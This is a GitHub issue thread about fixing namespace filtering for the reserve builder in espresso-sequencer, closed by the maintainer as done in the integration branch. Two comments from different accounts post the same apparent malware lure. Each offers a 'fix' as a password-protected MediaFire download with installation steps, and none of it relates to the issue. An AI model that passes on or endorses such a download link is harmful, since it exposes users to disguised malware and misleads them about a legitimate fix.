### ISSUE TITLE
Fix namespace filtering for the reserve builder

### ISSUE THREAD

**Issue by shenkeyao** [EspressoSystems/espresso-sequencer#1909]
We are using the namespaces from the bid config for the reserve builder, rather than the registered namespace list from the solver server, which may cause incorrect transaction filtering.

Code: https://github.com/EspressoSystems/espresso-sequencer/blob/ag/integration/marketplace-builder/src/builder.rs#L199.

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by shenkeyao** [comment]
Done in the integration branch.
